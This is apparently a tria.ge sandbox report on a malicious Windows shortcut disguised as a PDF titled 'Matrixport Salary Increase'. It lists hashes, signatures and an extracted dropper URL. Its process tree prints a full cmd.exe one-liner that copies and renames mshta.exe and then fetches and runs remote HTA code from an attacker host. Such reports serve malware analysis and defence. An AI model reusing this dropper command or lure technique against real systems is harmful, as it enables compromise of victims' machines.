Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
65s -
max time network
149s -
platform
windows10-1703_x64 -
resource
win10-20220812-ja -
resource tags
arch:x64arch:x86image:win10-20220812-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
21/09/2022, 22:46
Static task
static1
Behavioral task
behavioral1
Sample
Matrixport Salary Increase.pdf.lnk
Resource
win7-20220812-ja
5 signatures
150 seconds
General
-
Target
Matrixport Salary Increase.pdf.lnk
-
Size
391KB
-
MD5
47429bf0f19ab16bd659c9039b164a9e
-
SHA1
954493af1b8402a3dd27c4081724678adc522777
-
SHA256
0b79e1194644431c2e28c48aa3654e658a2907e1003cd0484cd00a0796ebe6bb
-
SHA512
c88734121ed700bdad92ba8525b180a5b345995d0114c5ab46b3f6fd05bd7caae75ea329c4e9e4fab5939ba1ad4db467fabdbc05812314e65959ccab2d391a22
-
SSDEEP
12288:ZGtnJ/gnqf+ys4BTC6jQcQovnjTuZrDIh:ZMntn+yFTd/jqJa
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://ms.onlineshares.cloud/WpY6pcQaHB5FyGgjo48r/RkErGkgsq73IIAq0bSVo04=
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 2 4812 mshta.exe 4 4812 mshta.exe 6 4812 mshta.exe 8 4812 mshta.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 5064 wrote to memory of 5100 5064 cmd.exe 68 PID 5064 wrote to memory of 5100 5064 cmd.exe 68 PID 5100 wrote to memory of 4812 5100 cmd.exe 69 PID 5100 wrote to memory of 4812 5100 cmd.exe 69
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Matrixport Salary Increase.pdf.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /q /c type C:\Windows\system32\msh*.exe>C:\Users\Public\msh&ren C:\Users\Public\* *ta.exe&for %i IN (C:\Users\Public\ms*.exe) DO start /b %~ni "https://ms.onlineshares.cloud/WpY6pcQaHB5FyGgjo48r/RkErGkgsq73IIAq0bSVo04="2⤵
- Suspicious use of WriteProcessMemory
PID:5100 -
\??\c:\windows\system32\mshta.exemshta "https://ms.onlineshares.cloud/WpY6pcQaHB5FyGgjo48r/RkErGkgsq73IIAq0bSVo04="3⤵
- Blocklisted process makes network request
- Checks whether UAC is enabled
PID:4812
-
-